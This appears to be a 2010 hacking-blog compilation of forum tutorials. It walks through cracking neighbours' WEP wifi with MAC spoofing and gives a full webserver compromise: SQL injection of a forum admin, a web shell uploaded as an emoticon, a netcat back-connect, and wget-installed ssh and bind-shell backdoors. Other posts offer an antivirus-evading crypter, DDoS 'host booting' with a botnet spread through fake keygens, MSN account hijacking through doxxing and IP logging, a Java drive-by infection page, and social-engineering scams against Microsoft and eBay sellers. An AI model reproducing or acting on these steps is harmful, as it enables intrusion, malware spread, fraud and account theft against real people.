Friday, June 4, 2010

[TuT] Hacking WEP Wifi Passwords

Basic Entry into a WEP Encrypted Network

**DISCLAIMER** - I know that many people have thrown up various tutorials before about hacking wep with Backtrack 3 but I never felt that they fully explained everything very well for noobs. (at least not the ones I read) This is in no way meant to attack someone else that has posted a tut on this before...I simply wanted to put one up that was very easy to follow even if you had never done anything like this before. Since this explains EVERYTHING in detail, it is quite long. Enjoy.

1. Getting the right tools

Download Backtrack 3. It can be found here:

http://www.remote-exploit.org/backtrack_download.html

The Backtrack 4 beta is out but until it is fully tested (especially if you are a noob) I would get the BT3 setup. The rest of this guide will proceed assuming you downloaded BT3. I downloaded the CD iso and burned it to a cd. Insert your BT3 cd/usb drive and reboot your computer into BT3. I always load into the 3rd boot option from the boot menu. (VESA/KDE) You only have a few seconds before it auto-boots into the 1st option so be ready. The 1st option boots too slowly or not at all so always boot from the 2nd or 3rd. Experiment to see what works best for you.

2. Preparing the victim network for attack

Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card.
Type:

airmon-ng

You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card.
Now type:

airmon-ng stop ath0

then type:

ifconfig wifi0 down

then:

macchanger --mac 00:11:22:33:44:55 wifi0

then:

airmon-ng start wifi0

What these steps did was to spoof (fake) your mac address so that JUST IN CASE your computeris discovered by someone as you are breaking in, they will not see your REAL mac address. Moving on...
Now it's time to discover some networks to break into.

Type:

airodump-ng ath0

Now you will see a list of wireless networks start to populate. Some will have a better signal than others and it is a good idea to pick one that has a decent signal otherwise it will take forever to crack or you may not be able to crack it at all.
Once you see the network that you want to crack, do this:

hold down ctrl and tap c

This will stop airodump from populating networks and will freeze the screen so that you can see the info that you need.

**Now from here on out, when I tell you to type a command, you need to replace whatever is in parenthesis with what I tell you to from your screen. For example: if i say to type:
-c (channel)
then dont actually type in
-c (channel)
Instead, replace that with whatever the channel number is...so, for example you would type:
-c 6
Can't be much clearer than that...lets continue...

Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.



Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --> 05:gk:30:fo:s9:2n
The Channel number will be under a heading that says "CH".
Now, in the same Konsole window, type:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0

the FILE NAME can be whatever you want. This is simply the place that airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "wepkey" because I can always remember it.

**Side Note: if you crack more than one network in the same session, you must have different file names for each one or it won't work. I usually just name them wepkey1, wepkey2, etc.

Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in noob terms all this means is "packets of info that contain clues to the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password.

Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IV's per second.

3. Actually cracking the WEP password

Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

http://i574.photobucket.com/albums/ss184...eplay1.jpg

This will send some commands to the router that basically cause it to associate with your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association Successful :-)" If this happens, then good! You are almost there. Now type:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

http://i574.photobucket.com/albums/ss184...eplay2.jpg

This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.

Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. Type:

aircrack-ng -b (bssid) (filename)-01.cap

Remember the filename you made up earlier? Mine was "wepkey". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000." DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.

http://i574.photobucket.com/albums/ss184...crack1.jpg

If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:
se:cr:et
This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:
0F:KW:94:27:VF
Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network. :-)

I will gladly answer any legitimate questions anyone has to the best of my ability.
HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this...read the tut and go experiment until you get it right.

There are rare occasions where someone will use WEP encryption with SKA as well. (Shared Key Authentication) If this is the case, additional steps are needed to associate with the router and therefore, the steps I lined out here will not work. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future.
Charny Screenshot tool v1.4

Charny Screenshot tool is a program that takes screenshots of your screen.

New features in v1.4 :
  • Bug fixes
  • New layout
  • Take a screenshot of the active window
  • Copy image to clipboard
  • And much more.

Screenshots :

The main form :
[Image: screenshot0v.png]

The logs :
[Image: screenshot6o.png]

The notify icon :
[Image: screenshot11k.png]

You can upload your images to ImageShack :

[Image: screenshot12x.png]

Virus Scan :


Download :

[Image:  link.png]

[ Source ] Toxic Crypter

The basic CyCrypter but I completly remodified it and made the stub FUD

The stub right now 4/22/10 Is 1/21 but if you use the icon changer then its FUD 0/21 only Avira detects it.

Screenshots Below



[Image: crypter.png]

In order to make the stub work and be 100% FUD do this

[Image: capturewf.png]

Download For Source
Code:
http://www.mediafire.com/?2nldzyjoj5g

Thursday, June 3, 2010

[TuT] How to Boost Your Wireless Internet Signal From You Router

Here is my TuT on how to Boost your Wireless internet [For Your Laptop, PSP, Wii..]

OK There are 2 Ways
~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--
~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--
The Ez-12 Parabolic Reflector "Way"

~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--
~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--
The Ez-10 10 dBi Corner Reflector "Way"
~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--
~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--~~--

for the EZ-12
If printed at the download size you will see about 9 dBi of gain. If you double the size of the image before you print it you will see about 12 dBi of gain. If you place two reflectors on an AP with two antennas you will see an additional increase in performance

and For the EZ-10
you will get about 11 dBi extra

i personally like the EZ-10 Better because its easier to make and i think it boosts my internet more.
Exploiting and Rooting a Webserver from

Scratch Complete Tutorial


Intro:

Hey guys this is The 7th Sage and for todays tutorial we shall learn how to

exploit and root a webserver also gaining future access. The tutorial is most likely to be divided in three parts.

1) Gaining Admin Access.
2) Uploading The Shell
3) Using the Shell to Gain Root Access


Hacking a Forum Admin using Exploit to Gain

Admin Access - Part 1

As said earlier i'm going to exploit ipb v2.1 forum here. You can hack

other forums too using exploits or making own exploits (which is rare :P)


Tools Needed:

This has the shell and backdoor files along with MD5 HashCracking tool and

some other things.




Download:


Code:
http://depositfiles.com/files/9juskrtax


Gaining Admin Access.

For today i will be hacking an ipb 2.1 forum by gaining admin access and

then I will show you how to root the server.

First i will be using a perl exploit and gain admin access to the forum. Usually the admin id

is 1 maybe 0 or 2 sometimes.

Here it is this guy:


UserName: Kawool
UserId = 2


Next we extract the user hash and salt. Switch to cmd and execute the perl

exploit.

[Image: 13230167.jpg]

Then you should see this sql injection tool.

Change the forum index path, userid (of the admin), the table name.


[Image:  59925653.jpg]

After you click get data from database you should see this hash:



[Image: 2iql3ex.jpg]

Then use converage pass salt option.


[Image: 2yuk7cg.jpg]


After you get the hash the next step to do is crack the salted hash. Since

it is ipb , cracking the hash will be a pain for sure.



Cracking the Hash:

I have provided passwords pro in the download above. It is a very efficient

tool to crack md5 hashes, even salted ones.

[Image: vwu8ud.jpg]

Now probably go to sleep or drink 4-5 cup of tea until the hash is cracked.

I got mine after sometime.

[Image: 317a8tf.jpg]

So now

Code:
Username: Kawool

Password: *******

I'm gonna login as admin now ^^; Lets move on to the main part of gaining root access.





Uploading The Shell as Admin - Part 2

Uploading a Shell:


Now that we have the admin access in our hand now is the part when we

upload a shell (For those who don't know what a shell is, It is a php script that gives

privilages to upload files on a website, mess with other files etc. And yeah allows to gain

root access too).

Uploading shell as smiley here.

In the ACP Go to Look and Feel -> Emoticon Manager -> Upload the shell file as smiley.

[Image: x3vfuw.jpg]


Now lets browse our shell shall we..

[Image: vzdnb5.jpg]

w00t we has the shell uploaded properly.Next upload a c99 shell from this shell. Why we did

this is because c99 shells can be detected somwetimes. So the other shell is like a decoy.

Once its done we upload c99 shell.

[Image: 2d1x0uh.jpg]

Good shell was uploaded properly.

[Image: m5vza.jpg]

That does it for our 2nd part. Move on to Third.

Using the Shell to Gain Root Access - Part 3


Now that we have all the shit ready for rooting lets upload a backconnect script. There are many and if one doesn't work usually the other does.

So i upload back.pl i provided in the file.

[Image: rlgoqo.jpg]

After thats done time to use the script.

For this we give the following code.

Code:
perl back.pl youripaddress

[Image: 2qvyx4n.jpg]




BEFORE we execute the script we need to start netcat and start listening to conenctions on

port 2121.

use netcat from my downloadfile, and use the command:

Code:
nc -vv -l -p 2121

You should see something like this

[Image: 6s6us6.jpg]



Next we shall upload an exploit that will let us obtain root status on the server :)

[Image: 214wq3m.jpg]

Time to execute it.

[Image: 15x8g1j.jpg]

Now we upload a backdoor for future access.

Type in the following command

Code:
wget www.revitalizemessage.com/xpl/sshdoor.tgz (or whatever ur link is)

[Image: 9i9xdk.jpg]


Now the following command.

Code:
tar -zxvf sshdoor.tgz

Then we make sshdoor the current directory using this code..

Code:
cd sshdoor

Then

Code:
cat README

after you see the window with sang and prabu name. Execute the command

Code:
.install yourpassword 2121

After thats done, we connect to the server via putty.

[Image: ibayw9.jpg]


Err an Epic Fail has occured my friends.

[Image: 142hv09.jpg]

Maybe the host blocked the port, nmap scan revealed it. Oh well we upload another backdoor quickly. You don't always win :D (actually hackers do O_O).


Now we upload xbind.c this should be over quickly. Remember the steps don't you?:D

Indeed its easy.

[Image: 17detv.jpg]


Compile the xbind.c using gcc compiler. (be sure to type cd.. and be in the correct directory to work with the script).

Code:
gcc -o xbind xbind.c


Compile, run and connect.

Paste the following code now

Code:
./xbind 1985

Switch to netcat again. and run the connection code (nc vv blah blha blah) to the ip.

Now enter teh password and get going.

Code:
uname -a

[Image: 29wv9yb.jpg]

There you go, we now have future access to the server :)

Wednesday, June 2, 2010

[TuT] How To Get Free Xbox Stuff

Introduction

Here I will explain how you can Social Engeneer and get a free xbox controller. This can be used for pretty much all products from microsoft but I don't know anyone who has tried this with an xbox :P.

Step 1

First you have to get the serial number from your xbox, sometimes they ask for this. It is located on the back of your xbox 360 console. Once you get this you can call them. The number for xbox support is:
  • Toll free (North American): (800) 4MY-XBOX
  • Direct dial (North American): (425) 635-7180
  • Freephone (Europe): 0800 587 1102

Step 2

Ok when you call you have to get to the repairs line. Once you get to a non-computerized person, ask them the status on your xbox live remote control. Tell them:
  • It was an Elite controller.
  • You sent it around a month ago

They will ask you your address and stuff, give it to them. Then they will say "We don't have record of your controller" Tell them something like the right trigger was stuck in. Start to sound mad saying I sent this such a long time ago. Normally they will say we only have white stock controllers, sound mad and say that will have to due. If they refuse ask to speak to a supervisor and sound really pissed off.

Conclusion

Wait a week or two and you should have a new xbox 360 controller in the mail. You can do this to get:
  • Headset
  • Transfer cable (Don't tell them you broke it, say you got a new xbox and want to xfer your data)
  • Possibly a new hd, haven't tried though.
  • Memory sticks
  • Wifi adapters
  • Microsoft points. You need to say that you cant download the DLC you buyed with the points.
  • Pretty much whatever.

If anyone tries this to get a new xbox post here and tell me if it works out for you. Because that would be pretty cool.

[TuT] Hack vBulletin 3 and Above

This summary is not available. Please click here to view the post.

[TuT] Host Booting on Xbox WIRELESSLY

Hello! And welcome to my 100% Step-by-step guide to Host Booting Wirelessly on xbox! I hope it helps. All comments appreciated! Thumbsup

Bridging
1. Plug your ethernet cord into your xbox from your modem
2. Open Network Connections on your laptop
3. Select yor LAN Connection and your Wireless Connection
4. Right click -> Bridge
DONE!


CommView
1. Open CommView.
2. Go to the rules tab, and then click on ports.
3. Add port 3074 --> Tick capture and both
DOWNLOAD HERE



Blocking Bungie IPs
1. Open "Rules" tab in CommView, then "Forumlas"
2. Put the name as "Bunjie"
3. As the formula put in
Code:
(sip from 65.59.234.0 to 65.59.234.255) or (dip from 65.59.234.0 to 65.59.234.255)
Then tick "ignore packets"
4. Add another one. Name "Bungie2" formula:
Code:
(sip from 65.55.42.0 to 65.55.42.255) or (dip from 65.55.42.0 to 65.55.42.255)
Tick "ignore packets"



Host Booting

Download Cracked DDoSer & Setup HERE *Thanx to DAROW and iLL ReDBuLL*

Spread your bot around (You'll need at least 10 bots to boot)
Best methods --> YouTube, Cracked programs, Keygens etc...

Now that you are setup, lets start booting!
.Go into a game (mw2, Halo3 etc..)
.Click the "PLAY" button in CommView and IPs should start coming in
.The host is the one with the most packets coming in/out
.Type the IP into your DDoSer and pick your desired booting settings
.Click "Start Flood"


Congratz! Host has been booted!


** EXTRA IFO**
You need ports 3074 and 3085 forwardded to use DDoSer!

[TuT] Reverting - Easy MSN Hack - Ultimate Guide

Firstly you'll need a victim. Once you have this victim, I would recommend opening a text document with the following sections.

[Image: notepadempty.png]

In this you'll see all the fields you'll need to fill for the revert form.
You will NOT need to fill out all of these in order to revert an account.
I'll note the importance of each field as we go along.


Email:

This field should be filled in already. If you're confused to what to put here, just leave. OJ, try reading from start again.


Full Name:

Ok this is where the S/E(social engineering) begins. If you have the victim on Facebook, or some other social networking site, where you can acquire their details, then fill out the fields you can, and skip along to where relevant.

If you Don't have a resource of their details, then visit this site:
PIPL

[Image:  ppls.png]

On here you can search people by various different means. In this case, we're going to use the email, as this is the only information we have at this point. So go to the email tab, type it in and hit search. IF the person has signed up to websites with this email, you should get a list of sites they've signed up to, and if the site has a little padlock next to the thumbnail pic, it means the profile is locked (you will need to be friends to view).

IMPORTANT NOTICE ABOUT pipl.com: This site is slightly unreliable. If you search once and nothing comes up, you could search again and get 10 results. So best to search several times to make sure you haven't missed anything. ALSO this site doesn't search on FACEBOOK, so after you've been on this, try logging into facebook and searching on there for your victim, and hope their profile is open to view. If this isn't the case, make a fake profile (preferably of the opposite sex), add a nice profile picture, add them and hope for the best.

If you can't get any information on your victim using the above methods, there's a good chance they don't use the email for anything, rendering it a useless hack. In which case you should try and find out their main email.

You can also try http://www.yasni.co.uk/ which is supposed to be a decent people search, but you cannot search by email, so this is to be used as a secondary search.

So by this point we should have covered:
Email, Full name, Date Of Birth, Country, State/County, so next...


Postcode/ZIP:

For the postcode, all you need to do is use the information you already have to your advantage. You should know which country and town they are from. So with this information, go to Google and type in the town + the words 'full postcode'. So for example, let's say the victim lived in Manchester, England. You would type 'Manchester full postcode' into the google search bar. Now in the results you should find full postcodes for that district, which should be located next to the boldly highlighted words that you searched. Here's an example:

[Image:  postcode.png]

And as the full postcode/zip isn't as necessary, it won't matter that it isn't exactly what your victims actual postcode is. The only problem with this method is success rate may vary with country and area. I have done this many times with English and American towns and rarely had a problem.


IP & ISP:

This is the hardest bit, yet still not very difficult.
To acquire a victims IP, you have a couple of options:

1. Get the victim to send you an email. This can be done by sending them something that would interest them, or just simply something that puzzles them, deeming them certain to reply to satisfy their curiosity. I would usually send an email asking ''Do you remember me from (blabla)'', using the information you gathered before, you should know their location and interests. Also don't forget to put a decent 'Subject', you want them to open it, not think it's just some junk/spam. Once they've replied, you now want to extract their IP address from the email. This is how it's done.

Go to your inbox, right-click the mail from the victim and click ''View message source'' Should look like this...

[Image: sourceemail.png]

After this you should see a white page with a load of jibberish that is of no relevance. But this is where the IP address of your victim lays.
What you're looking for is ''X-Originating IP:'' and after this will be the victims IP. It should look like this

[Image:  43574313.png]

If you have trouble finding the IP on this page, just hit ctrl+f for Finder and type IP. Should be maximum of 3-5, scroll through each one and I'm sure you'll find it.

2. Your second option is to get the person on MSN (unless you already have them), and get them to interact with you. You can use this tool to make it easier.

IPGet 1.5

This link is 100% safe, not uploaded by me, but is from another thread. Can scan if you like, but this isn't important anyway as there is another way around this. I won't explain how IPGet works as it is very basic but basically you need to get the victim to send or receive a file from you, or get them to send you a voice clip. IPGet will collect the IP. Here's a link for a IPGet tutorial:

IPGet Tutorial

Excuse the language, as I couldn't find a decent english one, but just follow the visual steps he takes in using IPGet.

DO NOT use any links advertised to download IPGet off of youtube, as I can't certify they're safe. I'd rather use the link I provided or try the other method coming up.

For the other option follow these instructions:
Start>Run>CMD(or command)
Then command prompt will pop-up. In command prompt, type ''netstat -n'' (without quotations). You should get a list like this...

[Image:  netstat.png]

But filled in with a little more numbers. Print screen and paste into paint.
Then you'll need to do the same as before, get the person to send or receive a file from you, preferably something decently big, as you'll need a little time. Once the file is active (sending), start>run>cmd>netstat -n again and print screen the page again. Now paste this into a NEW paint, and compare the two results. On the 2nd page there should be a new number to the list, this is the victims IP, so take it down and add it to your txt document you're compiling.

Lastly, your final option, is to visit:
MyIPTest.
From here all you need to do is send the victim a link, and it will log their IP once they've visited it. I won't explain how to use, as the site is pretty self explanatory.
DON'T FORGET to TunyUrl your link otherwise it will be too obvious and no-one will click it.
Thanks to bobblejim for this.

Ok so now the IP is covered, how do we get the ISP(Internet Service Provider). Well it's as easy as this. Go to:

IP Tracer Website

This is an IP tracer website, which can get you loads of details on a persons connection and even location, providing you know the IP.
So the page will look like this:

[Image:  iptrack.png]

Key:-
1. Is where we are going to enter the IP of the victim. Then hit the ''Track IP, host or website'' button.
2. Is where all the information on the victim will appear once the tracking is complete.

In the list of information (no.2) you should see a line for 'My ISP'. This is the Internet Service Provider the victim is running from the tracked IP.

So the only fields you should have empty now are 'Last sign in', 'Contacts', 'Mail' & 'Nickname', so let's keep it moving...


Last Sign-In:

All you'll need to do for this, is simply go onto their Facebook, or one of the sites you found out they were signed up to earlier, and see when they were last active. If the source is unreliable, just say ''Yesterday'' for this field, because if they are an active computer-user there's a good chance they were on.


Contacts:

To get the victims contacts for the ''Messenger contacts'' and ''Hotmail address book'' fields, all you need to do is go to their Facebook, or main social networking site, if they have one, and look at who they are most active with, i.e. who mostly leaves comments on their wall, likes their statuses etc. Good chance these are their closest friends, and therefore have them on MSN. You will need to collect the friends names AND emails if possible, although this isn't of extreme importance. Just so we're clear, MSN contacts and Hotmail address book contacts are the same, if you add someone to MSN, they will go to your address book.


Mail:

For the mail, you need to know some old mail they would have received in their hotmail inbox. All you need to do for this is visit http://www.pipl.com/ again (don't forget to search several times for more accurate results), and for all the results you get, that means they are signed up to the site, which in turn means they must have received registration emails from these websites. So take all these down and add them to your txt.


Nickname:

And finally we get to Nickname. Nice and simple, just add them on MSN, from another account, or if you have them already that's all good. Take down their screen/display name, and add it to your txt.

Ok so we should now have a complete form ready to revert this account.
Your txt. should look something like this.
[Image:  lastform.png]
Fake details, so no trying anything noobs Nono

So here's a list of the fields and level of importance:

Email: Extreme Importance for obvious reasons...
Full name: Very important
D.O.B: Very important
Country: Important
County/State: Not very important
Postcode: Not very important
IP&ISP: Not important atall (though they will help your case alot)
Last sign-in: Not very important, but don't overstep your mark
Contacts: Important that you get them right
Mail: Important that you get them right
Nickname: Important that you get it right


IF YOU DON'T KNOW A FIELD, SIMPLY SAY 'I DON'T KNOW' or 'I CANNOT REMEMBER'

Some fields aren't as important as others, although if you attempt a guess and get it wrong, you'll pay severely by failing this whole revert.


REMEMBER: When filling out this form, it's going to an ACTUAL PERSON, not being auto-read by some bot, so at the bottom in the ''additional info'' box, make the most of it. Let them know you're desperate for your account back for whatever reason. All this will help.


Finally, the whole point of this tutorial, here is the revert link:
Revert Link
Bookmark it, as it's not very easy to memorise

[TuT] Brand New Java Drive-By

Introduction

Welcome to my new Java Drive-By! This drive by will allow you to be "legit". What do I mean by legit? Well I mean that if you say "Come look at my sexy slideshow! *link to site*". They will go there and see a slideshow and go, okay! Now you have infected them, but are still playing with them. Good luck and please read this full post, I don't want the same questions over and over again!

What You Need

Before we get started you will need to get Java JDK to compile your .java. You will also need some pics of a hot ass girl, which can be found anywhere on the internet today. You will also need these files (all available here):

Update.java (Client) -

This is the main thing that will transfer your virus to their computer.

Slide.java (Slideshow) -

The slideshow will be the one to make you seem "legit".

maker.bat (Makes .jar & sig) -

Maker.bat will conver the .java -> .class -> .jar & sig. This is ment to make your life easier.

index.html (Main Page) -

When they visit your site this is what they will see. This html file is the key to putting it all togethor.

Java Error

Quote:'javac' is not recognized as an internal or external command, operable program or batch file.

Easy fix. If you haven't already, download Java JDK. Once you have it installed follow the step provided below.

Step 1 - Go to Start > Control Panel > System > Advanced tab > Environment Variables > System variables > Path > Edit.

Step 2 - Add a ; at the very end followed by C:\Program Files\Java\JDK VERSION\bin.

[Image: qrgrba.png]

Step 3 - Done. Now try it again.

FAQ

Q. Wont let me type, must be something wrong with the JDK I downloaded?
A. Just type the password, it wont show you typing it. It will just sit there blinking, it's okay just type the password. If you can't get the password right try 123456.

[TuT] How to get LEGIT Microsoft PID's for FREE!!

Requirements:
  • An active eBay account
  • A brain
  • Patience

Alright what you are going to do is your going to search for something on eBay lets say we want a SideWinder x8 Now you are going to search for the item on eBay.

[Image: tut1u.png]

Then, find a seller with low amount of feedback. This usually means they are inexperienced.

[Image:  tut2.png]

Then send them a private message stating something like this:

Quote:Hey, I recently saw online that Microsoft had made recalls on the [PRODUCT NAME] similar to the one you are selling. I'm not saying this product is affected but I would like to
be sure. Could you please send me the pid? So i can make sure it isn't
affected.

---Or---

Quote:Hey, I saw your selling a [PRODUCT NAME] and I recently saw online that many of the [PRODUCT NAME]'s have been recalled. I want to make sure it's not affected before I buy it so could you please provide me the PID so I can check it on the Microsoft database to make sure it's not affected? Thanks in advanced mate :]

Then just wait a few days, and they should reply with something like this:

[Image:  tut3.png]

---Or---

[Image: tut4g.png]